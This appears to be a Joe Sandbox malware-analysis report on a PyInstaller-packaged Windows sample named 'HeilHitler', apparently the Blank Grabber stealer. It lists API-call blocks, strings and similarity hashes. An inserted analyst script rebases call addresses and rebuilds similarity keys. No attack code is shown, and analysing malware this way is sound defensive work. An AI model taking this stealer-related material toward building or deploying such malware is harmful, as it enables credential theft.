                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF633D63706,?,00007FF633D63804), ref: 00007FF633D62C9E
                                                                                                                                                                                                                                            • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF633D63706,?,00007FF633D63804), ref: 00007FF633D62D63
                                                                                                                                                                                                                                            • MessageBoxW.USER32 ref: 00007FF633D62D99
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                                            • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                                            • API String ID: 3940978338-251083826
                                                                                                                                                                                                                                            • Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                            • Instruction ID: e887b4e9ee61f3d6761854eb8504e09a25780305fe5106c886124e6aca3dbb07
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 79310832708B4142E7209BA5B8152BA7791BF88B88F810236EF5DE7759EF3CE516D700
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF633D6DF7A,?,?,?,00007FF633D6DC6C,?,?,?,00007FF633D6D869), ref: 00007FF633D6DD4D
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF633D6DF7A,?,?,?,00007FF633D6DC6C,?,?,?,00007FF633D6D869), ref: 00007FF633D6DD5B
                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF633D6DF7A,?,?,?,00007FF633D6DC6C,?,?,?,00007FF633D6D869), ref: 00007FF633D6DD85
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,00007FF633D6DF7A,?,?,?,00007FF633D6DC6C,?,?,?,00007FF633D6D869), ref: 00007FF633D6DDF3
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF633D6DF7A,?,?,?,00007FF633D6DC6C,?,?,?,00007FF633D6D869), ref: 00007FF633D6DDFF
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                                                                                                            • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                            • Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                            • Instruction ID: 1018d420bc4576bb4e78e3352b4c7e5d447be61324c602785fa081507e9a0f08
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3B31C121B1EB02D1EE11AB82A4026B53394FF48BA4F994735DD3DAB389EF3CE4449710
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentProcess
                                                                                                                                                                                                                                            • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                            • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                            • Opcode ID: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
                                                                                                                                                                                                                                            • Instruction ID: 1349cc8312471161d2379808559c6e6d0b30e26a3d080edb85694fb6660dab5b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1E417131A1DA8691EA21DBA4E4162E97361FF44344FC00332EA6DA7795EF3CF519D740
APIs
• GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF633D6351A,?,00000000,00007FF633D63F1B), ref: 00007FF633D62AA0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: CurrentProcess
• String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
• API String ID: 2050909247-2900015858
• Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
• Instruction ID: 5e051762cfbcc9d9c02d9a40582793537229a18107c4dca1f2d83445d9370648
• Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
• Instruction Fuzzy Hash: 5F21A33261978182E7209B91F8427E67394FB88784F800236FE9CA3759DF7CD1459740
APIs
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
• Opcode ID: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
• Instruction ID: 86d6940a3b2219007d66e191e412a291f70027244548114bd368ba9229ea2f96
• Opcode Fuzzy Hash: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
• Instruction Fuzzy Hash: 8B215B20F0D24281FA686FE19A5323952525F447B0F144734ED3EFBBD6DE2CB455A300
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
• String ID: CONOUT$
• API String ID: 3230265001-3130406586
• Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
• Instruction ID: af53bc2dcb930963b7421398c021bcd4b1365de1eeb1f8282b70542f2ad61348
• Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
• Instruction Fuzzy Hash: 6711B621B18B4286E7508B92F85632963A0FB88FE4F040334EA6DDB7A4DF3CE9148740
APIs
• GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF633D63FA9), ref: 00007FF633D68EFD
• K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF633D63FA9), ref: 00007FF633D68F5A
  • Part of subcall function 00007FF633D69390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF633D645F4,00000000,00007FF633D61985), ref: 00007FF633D693C9
• K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF633D63FA9), ref: 00007FF633D68FE5
• K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF633D63FA9), ref: 00007FF633D69044
• FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF633D63FA9), ref: 00007FF633D69055
• FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF633D63FA9), ref: 00007FF633D6906A
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
• String ID:
• API String ID: 3462794448-0
• Opcode ID: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
• Instruction ID: 2cd8b1c69494db67d0b1a953af33810459aa8d9b5b5905be50cc7c462e16ab18
• Opcode Fuzzy Hash: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
• Instruction Fuzzy Hash: 2141B961B19A8281EB309B91A5422BAB394FF85BC4F841235DF6EE7789DF3CE511D700
APIs
• GetLastError.KERNEL32(?,?,?,00007FF633D74F11,?,?,?,?,00007FF633D7A48A,?,?,?,?,00007FF633D7718F), ref: 00007FF633D7B2D7
• FlsSetValue.KERNEL32(?,?,?,00007FF633D74F11,?,?,?,?,00007FF633D7A48A,?,?,?,?,00007FF633D7718F), ref: 00007FF633D7B30D
• FlsSetValue.KERNEL32(?,?,?,00007FF633D74F11,?,?,?,?,00007FF633D7A48A,?,?,?,?,00007FF633D7718F), ref: 00007FF633D7B33A
• FlsSetValue.KERNEL32(?,?,?,00007FF633D74F11,?,?,?,?,00007FF633D7A48A,?,?,?,?,00007FF633D7718F), ref: 00007FF633D7B34B
• FlsSetValue.KERNEL32(?,?,?,00007FF633D74F11,?,?,?,?,00007FF633D7A48A,?,?,?,?,00007FF633D7718F), ref: 00007FF633D7B35C
• SetLastError.KERNEL32(?,?,?,00007FF633D74F11,?,?,?,?,00007FF633D7A48A,?,?,?,?,00007FF633D7718F), ref: 00007FF633D7B377
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
• Opcode ID: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
• Instruction ID: 187532b38a27bdcbbcd2acae768bcb6fc113820c00d8ea0740a003fdd47af6c3
• Opcode Fuzzy Hash: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
• Instruction Fuzzy Hash: CC114F20F0C64282FA686FA1965323D62569F45BB0F544734E93EFB7E6DE6CF4916300
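Two things an analyst does with function blocks like the ones above: rebase each `ref:` address from the dump (image base 00007FF633D60000, per the Source File line) to an RVA so the call site can be found in the on-disk PE, and rebuild the `API ID` similarity key to cluster functions across reports. The `[PYI-%d:%s]` string in the first block is the PyInstaller bootloader's log prefix, consistent with Blank Grabber being a PyInstaller-packaged Python stealer. The script below is an added example, not part of the Joe Sandbox report or of the sample; its input is copied from three blocks above, and the token stop-list it uses to rebuild the key is inferred from the keys printed on this page and is an assumption, not Joe Sandbox's documented scheme.

```python
"""Rebase Joe Sandbox call sites to RVAs and rebuild the report's 'API ID' key.

Added example, not code from the Joe Sandbox report or from the analysed sample.
REPORT_EXCERPT is copied from the function blocks above. STOP_TOKENS is inferred
from the keys printed on this page (GetCurrentProcessId -> CurrentProcess,
FlsSetValue -> Value) and is an assumption, not Joe Sandbox's documented scheme.
"""
from __future__ import annotations

import re
from collections import Counter
from dataclasses import dataclass, field

# Constructed from three function blocks above; only lines this script reads are kept.
REPORT_EXCERPT = """\
APIs
• GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF633D6351A,?,00000000,00007FF633D63F1B), ref: 00007FF633D62AA0
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• API ID: CurrentProcess
APIs
• GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF633D63FA9), ref: 00007FF633D68EFD
• K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF633D63FA9), ref: 00007FF633D68F5A
  • Part of subcall function 00007FF633D69390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF633D645F4,00000000,00007FF633D61985), ref: 00007FF633D693C9
• K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF633D63FA9), ref: 00007FF633D68FE5
• K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF633D63FA9), ref: 00007FF633D69044
• FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF633D63FA9), ref: 00007FF633D69055
• FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF633D63FA9), ref: 00007FF633D6906A
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
APIs
• GetLastError.KERNEL32(?,?,?,00007FF633D74F11,?,?,?,?,00007FF633D7A48A,?,?,?,?,00007FF633D7718F), ref: 00007FF633D7B2D7
• FlsSetValue.KERNEL32(?,?,?,00007FF633D74F11,?,?,?,?,00007FF633D7A48A,?,?,?,?,00007FF633D7718F), ref: 00007FF633D7B30D
• FlsSetValue.KERNEL32(?,?,?,00007FF633D74F11,?,?,?,?,00007FF633D7A48A,?,?,?,?,00007FF633D7718F), ref: 00007FF633D7B33A
• FlsSetValue.KERNEL32(?,?,?,00007FF633D74F11,?,?,?,?,00007FF633D7A48A,?,?,?,?,00007FF633D7718F), ref: 00007FF633D7B34B
• FlsSetValue.KERNEL32(?,?,?,00007FF633D74F11,?,?,?,?,00007FF633D7A48A,?,?,?,?,00007FF633D7718F), ref: 00007FF633D7B35C
• SetLastError.KERNEL32(?,?,?,00007FF633D74F11,?,?,?,?,00007FF633D7A48A,?,?,?,?,00007FF633D7718F), ref: 00007FF633D7B377
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• API ID: Value$ErrorLast
"""

API_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<parent>[0-9A-F]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>[A-Z0-9]+)\([^)]*\), ref: (?P<ref>[0-9A-F]+)"
)
BASE_RE = re.compile(r"Offset: (?P<base>[0-9A-F]+), based on PE: true")
APIID_RE = re.compile(r"API ID: (?P<key>\S+)")
CAMEL_RE = re.compile(r"[A-Z][a-z]*\d*")  # K32GetModuleFileNameExW -> K32 Get Module File Name Ex W

# ASSUMED stop list: verb prefixes, Win32 suffixes and module prefixes the page's keys drop.
STOP_TOKENS = {"Get", "Set", "Id", "Ex", "W", "A", "To", "K32", "Fls"}


@dataclass
class ApiCall:
    name: str
    module: str
    ref_va: int            # address of the call site inside the memory dump
    parent_va: int | None  # set when the report lists it as "Part of subcall function"


@dataclass
class FunctionBlock:
    image_base: int = 0
    api_id: str = ""
    calls: list[ApiCall] = field(default_factory=list)

    def rva(self, va: int) -> int:
        return va - self.image_base  # dump VA -> RVA, to locate the call site in the on-disk PE

    def call_sites(self) -> list[tuple[str, int]]:
        return [(c.name, self.rva(c.ref_va)) for c in self.calls]


def parse_blocks(text: str) -> list[FunctionBlock]:
    """Start a new block at each 'APIs' header; attach API refs, image base and key to it."""
    blocks: list[FunctionBlock] = []
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            blocks.append(FunctionBlock())
        elif not blocks:
            continue
        elif m := API_RE.search(s):
            parent = int(m["parent"], 16) if m["parent"] else None
            blocks[-1].calls.append(ApiCall(m["name"], m["module"], int(m["ref"], 16), parent))
        elif m := BASE_RE.search(s):
            blocks[-1].image_base = int(m["base"], 16)
        elif m := APIID_RE.search(s):
            blocks[-1].api_id = m["key"]
    return blocks


def api_id_key(names: list[str]) -> str:
    """Rebuild the similarity key: CamelCase tokens minus STOP_TOKENS, grouped by occurrence
    count (descending, '$'-separated), alphabetical within each group."""
    counts = Counter(t for n in names for t in CAMEL_RE.findall(n) if t not in STOP_TOKENS)
    by_count: dict[int, list[str]] = {}
    for tok, c in counts.items():
        by_count.setdefault(c, []).append(tok)
    return "$".join("".join(sorted(by_count[c])) for c in sorted(by_count, reverse=True))


if __name__ == "__main__":
    for b in parse_blocks(REPORT_EXCERPT):
        rebuilt = api_id_key([c.name for c in b.calls])
        print(f"API ID {b.api_id}  (rebuilt matches: {rebuilt == b.api_id})")
        for name, rva in b.call_sites():
            print(f"  {name:<24} RVA 0x{rva:X}")
```

Run directly, it prints each block's call sites as RVAs (K32EnumProcessModules at 0x8F5A, for instance) and confirms the rebuilt key matches the report's `API ID` for all three blocks. The RVA is what to use in a disassembler or debugger regardless of where ASLR places the image; the key is what to feed a clustering query when the Opcode ID or fuzzy hashes differ across builds but the API usage does not.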
APIs
• GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF633D61B6A), ref: 00007FF633D6295E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentProcess
                                                                                                                                                                                                                                            • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                                            • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                                            • Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                            • Instruction ID: afd009434f3403cab6d77ae120dfd1b90e560974ea6bd378f7d987ca72e5539d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 29310872B1968152E7209BA5A8426E77395BF887D8F800232FE9DE3755EF3CD146D700
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                            • String ID: Unhandled exception in script
                                                                                                                                                                                                                                            • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                            • Opcode ID: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
                                                                                                                                                                                                                                            • Instruction ID: 82e56ad8a0df23da2c5ca72204515ecf9651ba7de6e1197dacfbe79d7a3fddff
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4318772619A8185EB20DFA1E8562F97360FF88788F840235EA4DDBB59DF3CD145D700
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF633D6918F,?,00007FF633D63C55), ref: 00007FF633D62BA0
                                                                                                                                                                                                                                            • MessageBoxW.USER32 ref: 00007FF633D62C2A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentMessageProcess
                                                                                                                                                                                                                                            • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                                            • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                                            • Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                            • Instruction ID: f9e216a77434f41ddc6c2818c5590be12bae5bfbd5c22c3e413d37561858f23e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2221F732708B4192E7119B94F8467EA73A4FB88784F805236EE8DA7756DF3CD215C740
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF633D61B99), ref: 00007FF633D62760
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentProcess
